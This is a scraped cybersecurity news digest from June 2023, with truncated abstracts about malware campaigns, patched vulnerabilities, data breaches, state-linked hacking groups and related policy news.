A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023. "The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric said in an analysis published Monday. The Dutch cybersecurity company said Anatsa-infected Google Play Store dropper apps have accrued over 30,000 installations to date, indicating that the official app storefront has become an effective distribution vector for the malware. Anatsa, also known by the name TeaBot and Toddler, first emerged in early 2021 , and has been observed masquerading as seemingly innocuous utility apps like PDF readers, QR code scanners, and two-factor authentication (2FA) apps on Google Play to siphon users' credentials. It has since become one oThe Hacker News
June 27, 2023 – Business
CalypsoAI Raises $23 Million for AI Security Tech Full Text
Abstract
The company, founded by DARPA, NASA, and DoD veterans, said the Series A-1 financing was led by Paladin Capital Group. Existing investors including Lockheed Martin Ventures, new investors Hakluyt Capital and Expeditions Fund, also took part.Cyware
June 27, 2023 – Vulnerabilities
New Fortinet’s FortiNAC Vulnerability Exposes Networks to Code Execution Attacks Full Text
Abstract
Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code. Tracked as CVE-2023-33299 , the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization. "A deserialization of untrusted data vulnerability [ CWE-502 ] in FortiNAC may allow an unauthenticated user to execute unauthorized code or commands via specifically crafted requests to the tcp/1050 service," Fortinet said in an advisory published last week. The shortcoming impacts the following products, with patches available in FortiNAC versions 7.2.2, 9.1.10, 9.2.8, and 9.4.3 or later - FortiNAC version 9.4.0 through 9.4.2 FortiNAC version 9.2.0 through 9.2.7 FortiNAC version 9.1.0 through 9.1.9 FortiNAC version 7.2.0 through 7.2.1 FortiNAC 8.8 all versions FortiNAC 8.7 all versions FortiNAC 8.6 all vThe Hacker News
June 27, 2023 – Vulnerabilities
Chrome 114 Update Patches High-Severity Vulnerabilities Full Text
Abstract
Google this week announced a new Chrome 114 update that patches a total of four vulnerabilities, including three high-severity bugs reported by external security researchers.Cyware
June 27, 2023 – Hacker
The potent cyber adversary threatening to further inflame Iranian politics Full Text
Abstract
The latest hack claimed by GhyamSarnegouni demonstrates the depth of information that hackers and hacktivists are accessing in Iran's internal politics, with potentially significant implications for national security.Cyware
June 26, 2023 – Outage
Sweetwater Union High School District confirms data breach caused outages in February Full Text
Abstract
The district says their investigation determined in mid-May that some personal information from current and former employees, their dependents, students, and families, was potentially accessed by attackers from the district's network.Cyware
June 26, 2023 – Education
Researchers Find Way to Recover Cryptographic Keys by Analyzing LED Flickers Full Text
Abstract
In what's an ingenious side-channel attack , a group of academics has found that it's possible to recover secret keys from a device by analyzing video footage of its power LED. "Cryptographic computations performed by the CPU change the power consumption of the device which affects the brightness of the device's power LED," researchers from the Ben-Gurion University of the Negev and Cornell University said in a study. By taking advantage of this observation, it's possible for threat actors to leverage video camera devices such as an iPhone 13 or an internet-connected surveillance camera to extract the cryptographic keys from a smart card reader. Specifically, video-based cryptanalysis is accomplished by obtaining video footage of rapid changes in an LED's brightness and exploiting the video camera's rolling shutter effect to capture the physical emanations. "This is caused by the fact that the power LED is connected directly to the powThe Hacker News
June 26, 2023 – Policy and Law
Citizen of Croatia charged with running the Monopoly Market drug marketplace Full Text
Abstract
Milomir Desnica, a citizen of Croatia and Serbia, has been charged with running the Monopoly Market drug darknet marketplace. Milomir Desnica (33), a citizen of Croatia and Serbia, has been extradited from Austria to the United States to face charges...Security Affairs
June 26, 2023 – Breach
MOVEit Breach Exposes Sensitive Data on New York City Public Schools Full Text
Abstract
A MOVEit cyberattack has exposed sensitive data on around 45 thousand New York City Public School students - as well as Department of Education staff and service providers.Cyware
June 26, 2023 – Attack
Japanese Cryptocurrency Exchange Falls Victim to JokerSpy macOS Backdoor Attack Full Text
Abstract
An unknown cryptocurrency exchange located in Japan was the target of a new attack earlier this month to deploy an Apple macOS backdoor called JokerSpy. Elastic Security Labs, which is monitoring the intrusion set under the name REF9134 , said the attack led to the installation of Swiftbelt, a Swift-based enumeration tool inspired by an open-source utility called SeatBelt . JokerSky was first documented by Bitdefender last week, describing it as a sophisticated toolkit designed to breach macOS machines. Very little is known about the threat actor behind the operation other than the fact that the attacks leverage a set of programs written in Python and Swift that come with capabilities to gather data and execute arbitrary commands on compromised hosts. A primary component of the toolkit is a self-signed multi-architecture binary known as xcc that's engineered to check for FullDiskAccess and ScreenRecording permissions. The file is signed as XProtectCheck, indicating anThe Hacker News
June 26, 2023 – Attack
Energy company Suncor suffered a cyber attack and its company Petro-Canada gas reported problems at its gas stations in Canada Full Text
Abstract
The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada's leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas,...Security Affairs
June 26, 2023 – Criminals
Cybercriminals target high-profit companies: AEI Full Text
Abstract
Cybercriminals tend to strike highly profitable companies, those holding abundant cash, and organizations that spend generously on advertising, according to an American Enterprise Institute study of cyberattacks from January 1999 until January 2022.Cyware
June 26, 2023 – Education
How Generative AI Can Dupe SaaS Authentication Protocols — And Effective Ways To Prevent Other Key AI Risks in SaaS Full Text
Abstract
Security and IT teams are routinely forced to adopt software before fully understanding the security risks. And AI tools are no exception. Employees and business leaders alike are flocking to generative AI software and similar programs, often unaware of the major SaaS security vulnerabilities they're introducing into the enterprise. A February 2023 generative AI survey of 1,000 executives revealed that 49% of respondents use ChatGPT now, and 30% plan to tap into the ubiquitous generative AI tool soon. Ninety-nine percent of those using ChatGPT claimed some form of cost-savings, and 25% attested to reducing expenses by $75,000 or more. As the researchers conducted this survey a mere three months after ChatGPT's general availability, today's ChatGPT and AI tool usage is undoubtedly higher. Security and risk teams are already overwhelmed protecting their SaaS estate (which has now become the operating system of business) from common vulnerabilities such as misconfiguratiThe Hacker News
June 26, 2023 – Vulnerabilities
Internet Systems Consortium (ISC) fixed three DoS flaw in BIND Full Text
Abstract
The Internet Systems Consortium (ISC) addressed three denial-of-service (DoS) vulnerabilities in the DNS software suite BIND. The Internet Systems Consortium (ISC) released security updates to address three denial-of-service (DoS) vulnerabilities...Security Affairs
June 26, 2023 – Botnet
Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign Full Text
Abstract
Unit 42 researchers uncovered a modified version of the Mirai botnet that is actively abusing at least 22 security flaws in devices manufactured by the likes of D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. The attackers aim to take control of these devices and utilize them to carry ... Read MoreCyware
June 26, 2023 – Attack
Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers Full Text
Abstract
Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard. The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said. Midnight Blizzard, formerly known as Nobelium , is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes. The group , which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities. It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area. "These credential attacks usThe Hacker News
June 26, 2023 – APT
China-linked APT group VANGUARD PANDA uses a new tradecraft in recent attacks Full Text
Abstract
China-linked APT group VANGUARD PANDA, aka Volt Typhoon, was spotted observing a novel tradecraft to gain initial access to target networks. CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using a novel...Security Affairs
June 26, 2023 – Outage
Activision Blizzard Games Crippled by Hours-Long DDoS Attack Full Text
Abstract
The attack lasted for more than 10 hours and was mitigated late on Sunday, according to Activision Blizzard’s statement on Twitter. Blizzard has not yet identified the hacker group behind it and no one has yet come forward to claim responsibility.Cyware
June 26, 2023 – Hacker
Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks Full Text
Abstract
The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda . "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said . Volt Typhoon, as known as Bronze Silhouette, is a cyber espionage group from China that's been linked to network intrusion operations against the U.S government, defense, and other critical infrastructure organizations. An analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools againstThe Hacker News
June 26, 2023 – Ransomware
An Overview of the Different Versions of the Trigona Ransomware Full Text
Abstract
Trigona ransomware is a relatively new family that targets compromised MSSQL servers and has been detected mainly in the technology and healthcare industries in countries such as the US, India, and Israel.Cyware
June 26, 2023 – General
Congress needs ‘private sector buy-in’ to address cyber workforce shortage Full Text
Abstract
Organizations are working to educate and train the next generation of professionals to fill critical cybersecurity vacancies, but private sector firms need to change their hiring practices to integrate this pool of talent into the workforce.Cyware
June 26, 2023 – Malware
Trojanized Super Mario Bros game spreads malware Full Text
Abstract
Researchers observed threat actors spreading a trojanized Super Mario Bros game installer to deliver multiple malware. Researchers from Cyble Research and Intelligence Labs (CRIL) discovered a trojanized Super Mario Bros game installer for Windows...Security Affairs
June 25, 2023 – Policy and Law
Twitter hacker sentenced to five years in prison for cybercrime offenses Full Text
Abstract
A U.K. citizen, who was involved in the attack on Twitter in 2020, was sentenced to five years in prison for cybercrime offenses. Joseph James O'Connor, aka PlugwalkJoe (24), the hacker who was involved in the attacks on Twitter in 2020, was sentenced...Security Affairs
June 25, 2023 – General
Security Affairs newsletter Round 425 by Pierluigi Paganini – International edition Full Text
Abstract
A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Someone...Security Affairs
June 24, 2023 – Vulnerabilities
US Military Personnel Targeted by Unsolicited Smartwatches Linked to Data Breaches Full Text
Abstract
Recent reports indicate that these seemingly innocuous devices, once activated, automatically connect to Wi-Fi networks and establish unauthorized connections with users’ cell phones, potentially exposing sensitive personal data.Cyware
June 24, 2023 – Government
U.S. Cybersecurity Agency Adds 6 Flaws to Known Exploited Vulnerabilities Catalog Full Text
Abstract
The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities ( KEV ) catalog, citing evidence of active exploitation. This comprises three vulnerabilities that Apple patched this week ( CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439 ), two flaws in VMware ( CVE-2023-20867 and CVE-2023-20887 ), and one shortcoming impacting Zyxel devices ( CVE-2023-27992 ). CVE-2023-32434 and CVE-2023-32435, both of which allow code execution, are said to have been exploited as zero-days to deploy spyware as part of a years-long cyber espionage campaign that commenced in 2019. Dubbed Operation Triangulation, the activity culminates in the deployment of TriangleDB that's designed to harvest a wide range of information from compromised devices, such as creating, modifying, removing, and stealing files, listing and terminating processes, gathering credentials from iCloud Keychain, and tracking a user's location. TheThe Hacker News
June 24, 2023 – Botnet
Researcher Identifies Popular Swing VPN Android App as DDoS Botnet Full Text
Abstract
Swing VPN is a legitimate VPN app developed for Android and iOS systems by Limestone Software Solutions. However, according to researcher Lecromee, the Android version of this app is a DDoS botnet and allegedly harbors malicious intent.Cyware
June 24, 2023 – Criminals
Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam Full Text
Abstract
A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S. Joseph James O'Connor (aka PlugwalkJoe), 24, was awarded the sentence on Friday in the Southern District of New York, a little over a month after he pleaded guilty to the criminal schemes. He was arrested in Spain in July 2021. The infamous Twitter breach allowed the defendant and his co-conspirators to obtain unauthorized access to backend tools used by Twitter, abusing them to hijack 130 popular accounts to perpetrate a crypto scam that netted them about $120,000 in illegal profits. "In other instances, the co-conspirators sold access to Twitter accounts to others," the U.S. Department of Justice (DoJ) said . "O'Connor communicated with others regarding purchasing unauthorized access to a variety of Twitter accounts, including accounts associated with public figures around the world." The defendant has also been accused oThe Hacker News
June 24, 2023 – Government
Someone is sending mysterious smartwatches to the US Military personnel Full Text
Abstract
U.S. Army’s Criminal Investigation Division warns that US military personnel have reported receiving unsolicited smartwatches in the mail. The U.S. Army’s Criminal Investigation Division reported that service members across the military received...Security Affairs
June 23, 2023 – Breach
2.5 million Genworth policyholders affected by MOVEit hack Full Text
Abstract
A third-party vendor lost the personal data of at least 2.5 million Genworth Financial policyholders, including Social Security numbers, to the Russian Cl0p ransomware gang, according to the Fortune 500 insurer.Cyware
June 23, 2023 – Criminals
Cybercrime Group ‘Muddled Libra’ Targets BPO Sector with Advanced Social Engineering Full Text
Abstract
A threat actor known as Muddled Libra is targeting the business process outsourcing (BPO) industry with persistent attacks that leverage advanced social engineering ploys to gain initial access. "The attack style defining Muddled Libra appeared on the cybersecurity radar in late 2022 with the release of the 0ktapus phishing kit, which offered a prebuilt hosting framework and bundled templates," Palo Alto Networks Unit 42 said in a technical report. Libra is the designation given by the cybersecurity company for cybercrime groups. The "muddled" moniker for the threat actor stems from the prevailing ambiguity with regards to the use of the 0ktapus framework. 0ktapus , also known as Scatter Swine, refers to an intrusion set that first came to light in August 2022 in connection with smishing attacks against over 100 organizations, including Twilio and Cloudflare. Then in late 2022, CrowdStrike detailed a string of cyber assaults aimed at telecom and BPO coThe Hacker News
June 23, 2023 – Solution
A New Kill Chain Approach to Disrupting Online Threats Full Text
Abstract
The defender community has learned a great deal since the 2016 U.S. election, but it still needs to find a common language.Lawfare
June 23, 2023 – Government
CISA orders govt agencies to fix recently disclosed flaws in Apple devices Full Text
Abstract
U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new security flaws to its Known...Security Affairs
June 23, 2023 – Business
Google announces $20 million investment for cyber clinics Full Text
Abstract
By deploying students to community organizations to improve digital defenses, university cybersecurity clinics aim to give students cybersecurity experience, improve local defensive capacity and steer students toward work in cybersecurity.Cyware
June 23, 2023 – Education
The Power of Browser Fingerprinting: Personalized UX, Fraud Detection, and Secure Logins Full Text
Abstract
The case for browser fingerprinting: personalizing user experience, improving fraud detection, and optimizing login security Have you ever heard of browser fingerprinting? You should! It's an online user identification technique that collects information about a visitor's web browser and its configuration preferences to associate individual browsing sessions with a single website visitor. With browser fingerprinting, many pieces of data can be collected about a user's web browser and device, such as screen resolution, location, language, and operating system. When you stitch these pieces together, they reveal a unique combination of information that forms every user's visitor ID or "digital fingerprint." Websites can use the visitor ID in various ways, including personalizing the user's experience, improving fraud detection, and optimizing login security. This article discusses the case for browser fingerprinting and how to use it safely on your websiThe Hacker News
June 23, 2023 – Vulnerabilities
VMware fixed five memory corruption issues in vCenter Server Full Text
Abstract
VMware addressed multiple memory corruption vulnerabilities in vCenter Server that can be exploited to achieve remote code execution. VMware released security updates to five memory corruption vulnerabilities (CVE-2023-20892, CVE-2023-20893, CVE-2023-20894,...Security Affairs
June 23, 2023 – Policy and Law
MOVEit Data Breach Victims Sue Progress Software Full Text
Abstract
Fallout for Progress Software continues over a massive data breach that appears to have affected hundreds of private and public sector organizations that use its MOVEit file transfer software.Cyware
June 23, 2023 – Malware
Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware Full Text
Abstract
A new strain of JavaScript dropper has been observed delivering next-stage payloads like Bumblebee and IcedID. Cybersecurity firm Deep Instinct is tracking the malware as PindOS , which contains the name in its " User-Agent " string. Both Bumblebee and IcedID serve as loaders, acting as a vector for other malware on compromised hosts, including ransomware. A recent report from Proofpoint highlighted IcedID's abandoning of banking fraud features to solely focus on malware delivery. Bumblebee , notably, is a replacement for another loader called BazarLoader , which has been attributed to the now-defunct TrickBot and Conti groups. A report from Secureworks in April 2022 found evidence of collaboration between several actors in the Russian cybercrime ecosystem, including that of Conti , Emotet , and IcedID. Deep Instinct's source code analysis of PindOS shows that it contains comments in Russian, raising the possibility of a continued partnership betweenThe Hacker News
June 23, 2023 – Vulnerabilities
Fortinet fixes critical FortiNAC RCE, install updates asap Full Text
Abstract
Fortinet addressed a critical remote command execution vulnerability, tracked as CVE-2023-33299, affecting FortiNAC solution. FortiNAC is a network access control (NAC) solution designed by Fortinet that is used by organizations to secure and control...Security Affairs
June 23, 2023 – Botnet
New Mirai botnet targets tens of flaws in popular IoT devices Full Text
Abstract
The botnet has been observed targeting IoT devices, routers, DVRs, access control systems, and Solar power generation monitoring systems from brands such as D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek.Cyware
June 23, 2023 – Government
NSA Releases Guide to Combat Powerful BlackLotus Bootkit Targeting Windows Systems Full Text
Abstract
The U.S. National Security Agency (NSA) on Thursday released guidance to help organizations detect and prevent infections of a Unified Extensible Firmware Interface ( UEFI ) bootkit called BlackLotus . To that end, the agency is recommending that "infrastructure owners take action by hardening user executable policies and monitoring the integrity of the boot partition." BlackLotus is an advanced crimeware solution that was first spotlighted in October 2022 by Kaspersky. A UEFI bootkit capable of bypassing Windows Secure Boot protections, samples of the malware have since emerged in the wild. This is accomplished by taking advantage of a known Windows flaw called Baton Drop ( CVE-2022-21894 , CVSS score: 4.4) discovered in vulnerable boot loaders not added into the Secure Boot DBX revocation list . The vulnerability was addressed by Microsoft in January 2022. This loophole could be exploited by threat actors to replace fully patched boot loaders with vulnerable vThe Hacker News
June 23, 2023 – Government
Federal incentives could help utilities overcome major cybersecurity hurdle: money Full Text
Abstract
A new cyber incentive framework from the Federal Energy Regulatory Commission could help utilities adapt to new threats at a faster pace, by providing flexibility for them to invest in pre-qualified cybersecurity measures.Cyware
June 23, 2023 – Cryptocurrency
New Cryptocurrency Mining Campaign Targets Linux Systems and IoT Devices Full Text
Abstract
Internet-facing Linux systems and Internet of Things (IoT) devices are being targeted as part of a new campaign designed to illicitly mine cryptocurrency. "The threat actors behind the attack use a backdoor that deploys a wide array of tools and components such as rootkits and an IRC bot to steal device resources for mining operations," Microsoft threat intelligence researcher Rotem Sde-Or said . "The backdoor also installs a patched version of OpenSSH on affected devices, allowing threat actors to hijack SSH credentials, move laterally within the network, and conceal malicious SSH connections." To pull off the scheme, misconfigured Linux hosts are brute-forced to gain initial access, following which the threat actors move to disable shell history and fetch a trojanized version of OpenSSH from a remote server. The rogue OpenSSH package is configured to install and launch the backdoor, a shell script that allows the attackers to distribute additional payloads aThe Hacker News
June 23, 2023 – Policy and Law
Data Breach Lawsuit Alleges Mismanagement of 3rd-Party Risk Full Text
Abstract
A proposed federal class action lawsuit alleges that patient debt collection software firm Intellihartx was negligent in its handling of third-party risk, contributing to a breach affecting nearly 490,000 individuals.Cyware
June 23, 2023 – Vulnerabilities
More than a million GitHub repositories potentially vulnerable to RepoJacking Full Text
Abstract
Researchers reported that millions of GitHub repositories are likely vulnerable to an attack called RepoJacking. A study conducted by Aqua researchers revealed that millions of GitHub repositories are potentially vulnerable to RepoJacking. In...Security Affairs
June 22, 2023 – Vulnerabilities
GitHub Dataset Research Reveals Millions Potentially Vulnerable to RepoJacking Full Text
Abstract
RepoJacking is a security vulnerability that may lead to code execution on organizations' internal or customer environments. Millions of GitHub repositories are potentially vulnerable to it, including popular organizations such as Google and Lyft.Cyware
June 22, 2023 – Phishing
MULTI#STORM Campaign Targets India and U.S. with Remote Access Trojans Full Text
Abstract
A new phishing campaign codenamed MULTI#STORM has set its sights on India and the U.S. by leveraging JavaScript files to deliver remote access trojans on compromised systems. "The attack chain ends with the victim machine infected with multiple unique RAT (remote access trojan) malware instances, such as Warzone RAT and Quasar RAT," Securonix researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said . "Both are used for command-and-control during different stages of the infection chain." The multi-stage attack chain commences when an email recipient clicks the embedded link pointing to a password-protected ZIP file ("REQUEST.zip") hosted on Microsoft OneDrive with the password "12345." Extracting the archive file reveals a heavily obfuscated JavaScript file ("REQUEST.js") that, when double clicked, activates the infection by executing two PowerShell commands that are responsible for retrieving two separate payloads from OneDriThe Hacker News
June 22, 2023 – Malware
Researchers Reverse Engineer Flutter-based Fluhorse Android Malware Full Text
Abstract
The malware poses as a legitimate app for an electronic toll system used in Southern Asia and steals user credentials and 2FA codes. The malware is distributed via email phishing campaigns and has been downloaded over 100,000 times.Cyware
June 22, 2023 – Education<br
Generative-AI apps & ChatGPT: Potential risks and mitigation strategies Full Text
Abstract
Losing sleep over Generative-AI apps? You're not alone or wrong. According to the Astrix Security Research Group, mid size organizations already have, on average, 54 Generative-AI integrations to core systems like Slack, GitHub and Google Workspace and this number is only expected to grow. Continue reading to understand the potential risks and how to minimize them. Book a Generative-AI Discovery session with Astrix Security's experts (free - no strings attached - agentless & zero friction) "Hey ChatGPT, review and optimize our source code" "Hey Jasper.ai, generate a summary email of all our net new customers from this quarter" "Hey Otter.ai, summarize our Zoom board meeting" In this era of financial turmoil, businesses and employees alike are constantly looking for tools to automate work processes and increase efficiency and productivity by connecting third party apps to core business systems such as Google workspace, Slack and GitHubThe Hacker News
June 22, 2023 – Botnet
New Mirai botnet targets tens of flaws in popular IoT devices Full Text
Abstract
Since March 2023, Unit 42 researchers have observed a variant of the Mirai botnet spreading by targeting tens of flaws in D-Link, Zyxel, and Netgear devices. Since March 2023, researchers at Palo Alto Networks Unit 42 have observed a new variant of the Mirai...Security Affairs
June 22, 2023 – Breach
Third-Party Vendor Exposes 3CX Data via Unsecured Elasticsearch and Kibana Instances Full Text
Abstract
A third-party vendor of 3CX left an open server and exposed sensitive data. Attackers could use the exposed call metadata, license keys, and database connection strings to spy on 3CX clients or launch more sophisticated attacks.Cyware
June 22, 2023 – General
Alert: Million of GitHub Repositories Likely Vulnerable to RepoJacking Attack Full Text
Abstract
Millions of software repositories on GitHub are likely vulnerable to an attack called RepoJacking , a new study has revealed. This includes repositories from organizations such as Google, Lyft, and several others, Massachusetts-based cloud-native security firm Aqua said in a Wednesday report. The supply chain vulnerability, also known as dependency repository hijacking, is a class of attacks that makes it possible to take over retired organization or user names and publish trojanized versions of repositories to run malicious code. "When a repository owner changes their username, a link is created between the old name and the new name for anyone who downloads dependencies from the old repository," researchers Ilay Goldman and Yakir Kadkoda said. "However, it is possible for anyone to create the old username and break this link." Alternatively, a similar scenario could arise when a repository ownership is transferred to another user and the original accountThe Hacker News
June 22, 2023 – Malware
Researchers released a PoC exploit for CVE-2023-20178 flaw in Cisco AnyConnect Secure Full Text
Abstract
The proof-of-concept (PoC) exploit code for high-severity vulnerability (CVE-2023-20178) in Cisco AnyConnect Secure was published online. A security researcher has published a proof-of-concept (PoC) exploit code for the high-severity vulnerability,...Security Affairs
June 22, 2023 – General
British law firms warned to upgrade cyber defenses against ransomware attacks Full Text
Abstract
Law firms in Britain were warned on Thursday to upgrade their cyber defenses in the wake of a number of ransomware attacks that led to sensitive and potentially legally privileged information being stolen by criminals and published online.Cyware
June 22, 2023 – Hacker
Camaro Dragon Hackers Strike with USB-Driven Self-Propagating Malware Full Text
Abstract
The Chinese cyber espionage actor known as Camaro Dragon has been observed leveraging a new strain of self-propagating malware that spreads through compromised USB drives. "While their primary focus has traditionally been Southeast Asian countries, this latest discovery reveals their global reach and highlights the alarming role USB drives play in spreading malware," Check Point said in new research shared with The Hacker News. The cybersecurity company, which found evidence of USB malware infections in Myanmar, South Korea, Great Britain, India, and Russia, said the findings are the result of a cyber incident that it investigated at an unnamed European hospital in early 2023. The probe found that the entity was not directly targeted by the adversary but rather suffered a breach via an employee's USB drive, which became infected when it was plugged into a colleague's computer at a conference in Asia. "Consequently, upon returning to the healthcare instituThe Hacker News
June 22, 2023 – Breach
Norton parent firm Gen Digital, was victim of a MOVEit ransomware attack too Full Text
Abstract
Norton parent firm, Gen Digital, was the victim of a ransomware attack that exploited the recently disclosed MOVEit zero-day vulnerability. Gen Digital Inc. (formerly Symantec Corporation and NortonLifeLock) is a multinational software company that...Security Affairs
June 22, 2023 – Cryptocurrency
Ukrainian Police Disrupt Cryptocurrency Scam Aimed at Canada Full Text
Abstract
Ukrainian and Canadian authorities conducted a joint operation to disrupt the two call centers and confiscate computer equipment, mobile phones, SIM cards, cars, and cash.Cyware
June 22, 2023 – Education
Unveiling the Unseen: Identifying Data Exfiltration with Machine Learning Full Text
Abstract
Why Data Exfiltration Detection is Paramount? The world is witnessing an exponential rise in ransomware and data theft employed to extort companies. At the same time, the industry faces numerous critical vulnerabilities in database software and company websites. This evolution paints a dire picture of data exposure and exfiltration that every security leader and team is grappling with. This article highlights this challenge and expounds on the benefits that Machine Learning algorithms and Network Detection & Response (NDR) approaches bring to the table. Data exfiltration often serves as the final act of a cyberattack, making it the last window of opportunity to detect the breach before the data is made public or is used for other sinister activities, such as espionage. However, data leakage isn't only an aftermath of cyberattacks, it can also be a consequence of human error. While prevention of data exfiltration through security controls is ideal, the escalating complexity aThe Hacker News
June 22, 2023 – Vulnerabilities
Apple addressed actively exploited zero-day flaws in iOS, macOS, and Safari Full Text
Abstract
Apple rolled out security updates to address actively exploited zero-day flaws in iOS, iPadOS, macOS, watchOS, and Safari. Apple addressed a set of vulnerabilities in iOS, iPadOS, macOS, watchOS, and the Safari browser that were actively exploited...Security Affairs
June 22, 2023 – Hacker
Russian hacking group puts fresh emphasis on stealing credentials Full Text
Abstract
These attacks by APT29 (aka Cozy Bear, Nobelium, or Midnight Blizzard) are directed at governments, IT service providers, nongovernmental organizations (NGOs), and defense and critical manufacturing industries.Cyware
June 22, 2023 – Vulnerabilities
Critical Flaw Found in WordPress Plugin for WooCommerce Used by 30,000 Websites Full Text
Abstract
A critical security flaw has been disclosed in the WordPress "Abandoned Cart Lite for WooCommerce" plugin that's installed on more than 30,000 websites. "This vulnerability makes it possible for an attacker to gain access to the accounts of users who have abandoned their carts, who are typically customers but can extend to other high-level users when the right conditions are met," Defiant's Wordfence said in an advisory. Tracked as CVE-2023-2986, the shortcoming has been rated 9.8 out of 10 for severity on the CVSS scoring system. It impacts all versions of the plugin, including and prior to versions 5.14.2. The problem, at its core, is a case of authentication bypass that arises as a result of insufficient encryption protections that are applied when customers are notified when they have abandoned their shopping carts on e-commerce sites without completing the purchase. Specifically, the encryption key is hard-coded in the plugin, thereby allowingThe Hacker News
June 22, 2023 – Malware
Analyzing the TriangleDB implant used in Operation Triangulation Full Text
Abstract
Kaspersky provided more details about Operation Triangulation, including the exploitation chain and the implant used by the threat actors. Kaspersky researchers dug into Operation Triangulation and discovered more details about the exploit chain employed...Security Affairs
June 22, 2023 – Outage
Hawaiʻi Community College Hit with NoEscape Ransomware Attack Full Text
Abstract
Hawai?i Community College is the latest university to deal with a ransomware attack, announcing on Tuesday night that it was forced to shut off its network and contact federal authorities about the incident.Cyware
June 22, 2023 – Vulnerabilities<br
Zero-Day Alert: Apple Releases Patches for Actively Exploited Flaws in iOS, macOS, and Safari Full Text
Abstract
Apple on Wednesday released a slew of updates for iOS, iPadOS, macOS, watchOS, and Safari browser to address a set of flaws it said were actively exploited in the wild. This includes a pair of zero-days that have been weaponized in a mobile surveillance campaign called Operation Triangulation that has been active since 2019. The exact threat actor behind the activity is not known. CVE-2023-32434 - An integer overflow vulnerability in the Kernel that could be exploited by a malicious app to execute arbitrary code with kernel privileges. CVE-2023-32435 - A memory corruption vulnerability in WebKit that could lead to arbitrary code execution when processing specially crafted web content. The iPhone maker said it's aware that the two issues "may have been actively exploited against versions of iOS released before iOS 15.7," crediting Kaspersky researchers Georgy Kucherin, Leonid Bezvershenko, and Boris Larin for reporting them. The advisory comes as the RussiaThe Hacker News
June 22, 2023 – General<br
CISOs’ New Stressors Brought on by Digitalization: Report Full Text
Abstract
Salt Security surveyed an international selection of 300 CISOs and CSOs to examine the cybersecurity ramifications of digitalization – and it is worth noting that almost 90% of them said that digital transformation introduces unforeseen risks.Cyware
June 22, 2023 – Malware
RDStealer Compromises Remote Desktop Drives for Data Theft Full Text
Abstract
Researchers took the wraps off of a year-long cyberattack campaign deploying a custom Golang malware called RDStealer. The malware strain focuses on stealing credentials and extracting data from compromised hosts. Not a coincidence but all the compromised machines were Dell-manufactured devices.Cyware
June 21, 2023 – Hacker
ScarCruft Hackers Exploit Ably Service for Stealthy Wiretapping Attacks Full Text
Abstract
The North Korean threat actor known as ScarCruft has been observed using an information-stealing malware with previous undocumented wiretapping features as well as a backdoor developed using Golang that exploits the Ably real-time messaging service. "The threat actor sent their commands through the Golang backdoor that is using the Ably service," the AhnLab Security Emergency response Center (ASEC) said in a technical report. "The API key value required for command communication was saved in a GitHub repository." ScarCruft is a state-sponsored outfit with links to North Korea's Ministry of State Security (MSS). It's known to be active since at least 2012. Attack chains mounted by the group entail the use of spear-phishing lures to deliver RokRAT , although it has leveraged a wide range of other custom tools to harvest sensitive information. In the latest intrusion detected by ASEC, the email comes bearing a Microsoft Compiled HTML Help (.CHM) file --The Hacker News
June 21, 2023 – APT
Russia-linked APT28 hacked Roundcube email servers of Ukrainian entities Full Text
Abstract
Russia-linked APT28 group hacked into Roundcube email servers belonging to multiple Ukrainian organizations. A joint investigation conducted by Ukraine's Computer Emergency Response Team (CERT-UA) and Recorded Future revealed that the Russia-linked...Security Affairs
June 21, 2023 – Vulnerabilities
Critical WordPress Plugin Vulnerabilities Impact Thousands of Sites Full Text
Abstract
The first security defect, tracked as CVE-2023-2986 (CVSS score 9.8/10), impacts the Abandoned Cart Lite for WooCommerce, a plugin that notifies customers who did not complete the purchase process, and which has more than 30,000 active installations.Cyware
June 21, 2023 – Malware
New Report Exposes Operation Triangulation’s Spyware Implant Targeting iOS Devices Full Text
Abstract
